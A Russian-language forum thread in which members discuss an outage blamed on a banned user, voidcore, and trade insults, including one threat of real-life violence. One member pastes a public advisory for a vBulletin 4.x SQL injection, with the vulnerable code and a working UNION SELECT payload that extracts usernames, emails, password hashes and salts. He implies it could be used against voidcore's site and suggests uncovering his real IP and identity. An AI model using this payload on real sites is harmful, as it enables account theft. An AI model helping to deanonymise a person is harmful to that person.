Не работал форум во вторник!

[MaTBeu]

Пользователь voidcore был заблокирован за разжигание личностной розни и призывы к революционному свержению действующего правительства, с использованием шантажа и школьных фраз.

Финита.

Чего с такими панькаться? Не нравится на форуме - вали. Нашелся тут, вендетту устраивать.

"Это интернет, деточка, тут могут послать нах*й." (с) Народная мудрость.

[Alar]

Давайте не будем, ссориться а просто забудем обиды. Ещё раз прошу - давайте не будем брать форум в заложники - найдите способ решить проблемы между собой. можно через меня если лично это не получается. буду благодарен за стабильную работу форума.

[misher]

Круто, и мой блог уложил... За что? За посты в этой теме...

[Пепел Феникса]

Цитата:

до фени

не надо до меня.

Цитата:

Пепел Феникса, не обижайся, это наверно новый вид троллинга, наверно личное изобретение voidcore.

да я не обижаюсь.

Цитата:

Ну войдет он под новым ником и все дела

насчет нового ника, не знаю, а вот уйти-то есть куда.

Цитата:

найдите способ решить проблемы между собой.

да было бы известно в чем проблема-то..

[Alar]

Кого-то забанить без причин это не выполнимое требование. Если было оскорбление на форуме, то нужно на него указать и я приму меры.

Прошу, ддосеров оставить в покое форум, так как никому падение ресурса пользы не принесёт

[Noor]

Интересно,voidcore имеет хоть какое-то отношение к Одноименному форуму? Может это такая пиар акция по переманиванию пользователей ?

[misher]

это он и есть, я уверен...

[asmodey1]

Цитата:

Сообщение от Noor

Интересно,voidcore имеет хоть какое-то отношение к Одноименному форуму? Может это такая пиар акция по переманиванию пользователей ?

Полагаю, это именно он. Раньше он админил на web-hack.ru... Теперь он его закрыл и открыл новый - voidcore.ru
Уж очень хочется бабла нарубить. Только опять пошел по неправильному пути...

З.Ы. Уже давно привык решать проблемы без физического воздействия, но в данном конкретном случае опять кулаки чешутся.
З.Ы.Ы. Слышь, ты, козел ! Слабо в реале встретиться ? Вот ужо я на тебе высплюсь...

[vasek123]

Цитата:

Сообщение от asmodey1

Полагаю, это именно он. Раньше он админил на web-hack.ru... Теперь он его закрыл и открыл новый - voidcore.ru

Мдя... Посмотрел, что за сайт- пипец, куча уязвимостей. Например:

PHP код:

# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day 
# Google Dork: intitle: powered by Vbulletin 4 
# Date: 20/07/2011 
# Author: FB1H2S     
# Software Link: [[url]http://www.vbulletin.com/][/url] 
# Version: [4.x.x] 
# Tested on: [relevant os] 
# CVE : [[url]http://members.vbulletin.com/][/url] 
  
###################################################################################################### 
Vulnerability: 
###################################################################################################### 
  
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation. 
  
##################################################################################################### 
Vulnerable Code: 
##################################################################################################### 
  
File:    /vbforum/search/type/socialgroupmessage.php 
Line No: 388 
Paramater : messagegroupid 
  
  
  
          
        if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0) 
  
        { 
  
            $value = $registry->GPC['messagegroupid']; 
  
            if (!is_array($value)) 
  
            { 
  
                $value = array($value); 
  
            } 
  
  
  
            if (!(in_array(' ',$value) OR in_array('',$value))) 
  
            { 
  
                if ($rst = $vbulletin->db->query_read(" 
  
                    SELECT socialgroup.name 
  
                    FROM " . TABLE_PREFIX."socialgroup AS socialgroup 
  
--->                 WHERE socialgroup.groupid IN (" . implode(', ', $value) .")") 
  
                  
            } 
  
  
  
############################################################################################ 
Exploitation: 
############################################################################################ 
Post data on: -->search.php?search_type=1 
          --> Search Single Content Type 
  
Keywords :   Valid Group Message 
  
Search Type : Group Messages  
  
Search in Group : Valid Group Id 
  
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# 
  
########################################################################################## 
More Details: 
########################################################################################## 
[url]Http://www.Garage4Hackers.com[/url] 
[url]http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day[/url] 
  
  
########################################################################################### 
Note: 
########################################################################################### 
  
Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence 
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ". 


http://www.exploit-db.com/exploits/17555/

Мдя... Кулхацкер, блин

Неплохо- бы узнать IP- шник(а еще лучше, реальные данные) этого voidcore...

Цитата:

Сообщение от misher

IP уже не катит... Если кто-то будет что-то делать даже ребенок теперь догадается про прокси...

Так я про реальный IP!!!

[asmodey1]

Айпишник его есть у любого модера, но наверняка он ходит через прокси...